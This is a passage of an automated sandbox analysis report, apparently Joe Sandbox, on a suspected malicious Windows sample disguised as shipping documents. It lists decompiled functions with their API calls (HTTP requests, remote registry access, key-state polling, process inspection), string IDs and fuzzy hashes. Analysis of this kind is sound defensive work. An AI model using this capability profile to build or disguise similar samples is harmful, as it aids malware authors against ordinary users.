                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharLower_memmove
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 3425801089-567219261
                                                • Opcode ID: 12d890d4ebe2c0cfa2a8c64000b42bc585f7105bd99f21c1dc4458775b4f90c0
                                                • Instruction ID: cbe8c3176680e29866e9d68a9fed947b0b355ed6a0a976a85c99b7b2ae811c67
                                                • Opcode Fuzzy Hash: 12d890d4ebe2c0cfa2a8c64000b42bc585f7105bd99f21c1dc4458775b4f90c0
                                                • Instruction Fuzzy Hash: 9E3161B0500619EBCF10EF98C8819EEB7F9FF05310B108A6DE866A76D1DB75AD05CB84
                                                Function 006E9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E93F6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E9409
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 006E9439
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: 55d9a6261c46651d77beb9506975a30dabeedf1387bf7aa57a6d5c6443dfff98
                                                • Instruction ID: d1d75b59e796b36bab096371193534996236c69815a361f272a70466481705c6
                                                • Opcode Fuzzy Hash: 55d9a6261c46651d77beb9506975a30dabeedf1387bf7aa57a6d5c6443dfff98
                                                • Instruction Fuzzy Hash: 1B2104B1901204BEDB14AB75DC868FFB7BEDF05320B10811DF925972E1DB380E4A9624
                                                Function 0069410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006CD5EC
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • _memset.LIBCMT ref: 0069418D
                                                • _wcscpy.LIBCMT ref: 006941E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006941F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 3942752672-1585850449
                                                • Opcode ID: 151724576557e80842b61a5cac69bda3162b4f518b4c5fe93f65826679ec5451
                                                • Instruction ID: 55f09644eb3624c53d7f3fa478de0e482b2bd8d3f892bc4caec896bb9e3b9829
                                                • Opcode Fuzzy Hash: 151724576557e80842b61a5cac69bda3162b4f518b4c5fe93f65826679ec5451
                                                • Instruction Fuzzy Hash: 2F31D371008304AADBA1EB60DC45FEB77EDAF44300F10851EF585935A1EFB4A649C79A
                                                Function 00701B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00701B40
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701B66
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00701B96
                                                • InternetCloseHandle.WININET(00000000), ref: 00701BDD
                                                  • Part of subcall function 00702777: GetLastError.KERNEL32(?,?,00701B0B,00000000,00000000,00000001), ref: 0070278C
                                                  • Part of subcall function 00702777: SetEvent.KERNEL32(?,?,00701B0B,00000000,00000000,00000001), ref: 007027A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: af31eb74430e69b3055fbf6028d289c942793123ae9b4af1bc2c5363b7b1e34a
                                                • Instruction ID: 590d9733a77702f98485787a579e9af261afdf48d3d951f82c925404567fdfa5
                                                • Opcode Fuzzy Hash: af31eb74430e69b3055fbf6028d289c942793123ae9b4af1bc2c5363b7b1e34a
                                                • Instruction Fuzzy Hash: F4219FB1600208FFEB119F649C89EBF77ECEB49754F50822AF505A62C0EB289D059775
                                                Function 00716656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007166D0
                                                • LoadLibraryW.KERNEL32(?), ref: 007166D7
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007166EC
                                                • DestroyWindow.USER32(?), ref: 007166F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: dcc945c247dcd5f6b439afe4b087b00bb9f96af6490c28b5f69e9e27ee9797f7
                                                • Instruction ID: 3262d58c552d4a0d01740c3a544da57fc20d92899596a0f6fcf11f1e68fe4c26
                                                • Opcode Fuzzy Hash: dcc945c247dcd5f6b439afe4b087b00bb9f96af6490c28b5f69e9e27ee9797f7
                                                • Instruction Fuzzy Hash: DE2188B1200206EBEF108E68EC91EEB37ADEB59768F108629F910921E0D779CC919764
                                                Function 006F703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 006F705E
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F7091
                                                • GetStdHandle.KERNEL32(0000000C), ref: 006F70A3
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006F70DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 19297f08e198323b95213c708fdfcc6d01eaa408cb99a7eabfcbb24b9c55d472
                                                • Instruction ID: 3bfe362d7ee094d6da09e6a7d9d168fe139ae56f7ae70cf745f976822b01475e
                                                • Opcode Fuzzy Hash: 19297f08e198323b95213c708fdfcc6d01eaa408cb99a7eabfcbb24b9c55d472
                                                • Instruction Fuzzy Hash: 3B2192B450420DABDB209F38DC05AEA77BABF44720F208619FEA0D73D0DB709951CB64
                                                Function 006F710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 006F712B
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F715D
                                                • GetStdHandle.KERNEL32(000000F6), ref: 006F716E
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006F71A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 66b35d9de33d45af8cc018555cc37fd5bc4216d8b423ec1e11a4dfd8ae199786
                                                • Instruction ID: 70378d8855bd41b98135f1167b7174e4eb7c7efc1ea4a2538fba576014e866bd
                                                • Opcode Fuzzy Hash: 66b35d9de33d45af8cc018555cc37fd5bc4216d8b423ec1e11a4dfd8ae199786
                                                • Instruction Fuzzy Hash: 3321907550820DABDB20DF689C05AFAB7AAAF55730F244619FEA0D33D0D7709845CB54
                                                Function 006FAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FAEBF
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006FAF13
                                                • __swprintf.LIBCMT ref: 006FAF2C
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0071F910), ref: 006FAF6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 84a9ab760c912dab61d3f24aefb0f1d836a431b562ea5af22ff619fccb38547d
                                                • Instruction ID: 933a098d3c016d5c87c72af6e3060650c342ecd7f7d8ec824e730fbb058c1813
                                                • Opcode Fuzzy Hash: 84a9ab760c912dab61d3f24aefb0f1d836a431b562ea5af22ff619fccb38547d
                                                • Instruction Fuzzy Hash: A4216074A0020DAFCB50EF68C985DEE7BB9EF49704B00806DF909EB251DB35EA41DB25
                                                Function 006EA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                  • Part of subcall function 006EA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006EA399
                                                  • Part of subcall function 006EA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA3AC
                                                  • Part of subcall function 006EA37C: GetCurrentThreadId.KERNEL32 ref: 006EA3B3
                                                  • Part of subcall function 006EA37C: AttachThreadInput.USER32(00000000), ref: 006EA3BA
                                                • GetFocus.USER32 ref: 006EA554
                                                  • Part of subcall function 006EA3C5: GetParent.USER32(?), ref: 006EA3D3
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EA59D
                                                • EnumChildWindows.USER32(?,006EA615), ref: 006EA5C5
                                                • __swprintf.LIBCMT ref: 006EA5DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: a8d9f72ac9e2a126eb7f5e6f8dd4dcaed590a00f6ed4c55251fba9e05dc05adc
                                                • Instruction ID: a703a30783cd18c802abd5eee23c7029ab33318c88a6181c9377acb13df555f5
                                                • Opcode Fuzzy Hash: a8d9f72ac9e2a126eb7f5e6f8dd4dcaed590a00f6ed4c55251fba9e05dc05adc
                                                • Instruction Fuzzy Hash: DA11E471201308BBCF10BFA5DC85FEA377E9F49300F008079F908AA192DA7469468B39
                                                Function 006F2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 006F2048
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 3964851224-769500911
                                                • Opcode ID: 27eb6d58f0088e7d52437cdc87e8a85aaf57f008c48eb6af53b43c8949fe5935
                                                • Instruction ID: a37df1646538a6bc524a9e8f5ac4fd63b6ed969d2255165a499dfa91a582b078
                                                • Opcode Fuzzy Hash: 27eb6d58f0088e7d52437cdc87e8a85aaf57f008c48eb6af53b43c8949fe5935
                                                • Instruction Fuzzy Hash: BC115B7195010E9FDF40EFA4D8518FEB7B6FF15304B1084A8E855A7396EB326916CF50
                                                Function 0070EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070EF1B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070EF4B
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0070F07E
                                                • CloseHandle.KERNEL32(?), ref: 0070F0FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: e9ff47dfef55d83a86f59b41814119d78a34a63802b856cca618a22c8fa76dc6
                                                • Instruction ID: b2f340630357edbf10d398ccfcf21f5b4ca4422991e5b6fc941ae6757a398fc6
                                                • Opcode Fuzzy Hash: e9ff47dfef55d83a86f59b41814119d78a34a63802b856cca618a22c8fa76dc6
                                                • Instruction Fuzzy Hash: 8481A1716003009FDB60DF28C886B2EB7EAEF48720F04891DF599DB6D2DB74AC018B55
                                                Function 007102C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710388
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007103C7
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0071040E
                                                • RegCloseKey.ADVAPI32(?,?), ref: 0071043A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00710447
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: 840e825b218a17cc804f458d02ab8ebbb0e83c17aae018159e0614a955b58632
                                                • Instruction ID: adb7db1828ea37a83c375b46e16fae39e57167db28776e4f4d0d6c38cbf264fd
                                                • Opcode Fuzzy Hash: 840e825b218a17cc804f458d02ab8ebbb0e83c17aae018159e0614a955b58632
                                                • Instruction Fuzzy Hash: F3515C31208244AFDB04EF58C881EAEB7E9FF88704F04892DF5958B2A1DB74E944CB56
                                                Function 006FE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006FE88A
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006FE8B3
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006FE8F2
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006FE917
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006FE91F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: a56071225b41caf9388b2a20c09d82df2ca8eb14cefb10d4a35d0ddbc78f1130
                                                • Instruction ID: 8ff9dfd6ca09fecff2e62761eb5dc1ddf56bd753e6f687d7bb6c9a8f462842d8
                                                • Opcode Fuzzy Hash: a56071225b41caf9388b2a20c09d82df2ca8eb14cefb10d4a35d0ddbc78f1130
                                                • Instruction Fuzzy Hash: 62511E35A00209DFCF41EF68C9819ADBBFAFF08310B148099E949AB761CB35ED51DB64
                                                Function 0071A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91528128c6e69d2f5e72f58d7d6b717991b0fc9739031c8051ab791900d1973f
                                                • Instruction ID: dd31fec0ff1b0c7b0379cd3d5f4fd7bba33310408439e1af90a88152cbd87f80
                                                • Opcode Fuzzy Hash: 91528128c6e69d2f5e72f58d7d6b717991b0fc9739031c8051ab791900d1973f
                                                • Instruction Fuzzy Hash: F041F535902204BFC710DF6CCC48FE9BBA5EB09310F558165FC65A72E1D778AD81DA51
                                                Function 00692344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00692357
                                                • ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                • GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: d88ecf350b4d5ae48ea0ff64860c1513191b2351b3f90d5d09c99f8eeb6a1876
                                                • Instruction ID: 44db483f05e1b127746aa1f8cf2f9b63b42a01e7817efb1342755e9519bd85ca
                                                • Opcode Fuzzy Hash: d88ecf350b4d5ae48ea0ff64860c1513191b2351b3f90d5d09c99f8eeb6a1876
                                                • Instruction Fuzzy Hash: 21415135504116FBDF159F68C844FF9BB76FB05360F10835AF82992290C7389E94DB91
                                                Function 006E6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E695D
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 006E69A9
                                                • TranslateMessage.USER32(?), ref: 006E69D2
                                                • DispatchMessageW.USER32(?), ref: 006E69DC
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E69EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
